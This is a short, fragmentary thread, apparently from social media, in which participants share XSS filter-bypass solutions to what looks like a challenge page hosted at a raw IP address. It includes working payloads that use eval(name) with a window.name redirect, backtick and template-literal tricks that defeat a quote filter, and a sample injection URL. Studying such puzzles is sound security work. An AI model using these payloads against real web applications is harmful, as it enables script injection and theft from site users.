Where instead of alert(1337) I used eval(name) and redirected the admin to my website with this bypass: http://3.114.5.202/fd.php?q=trnq。cf? which set the window.name property.
-
1. I bypassed the " and ' filter (it only allowed you to use them once) with backticks `
2. I kept one big string via ${y=` that creates another context and which was closed with `} in each injection point
3. I inserted the class keyword that allows defining ${} as a class
4. {( closes code.
pic.twitter.com/VjRuQ0f0xI
-
Here's mine, pretty much the same ", ` position: http://3.114.5.202/fd.php?q=${alert()}`-"-(`${`
-
This is totally mind-blowing.
I played with parentheses and brackets for a while but didn't manage to craft something like this.
from this year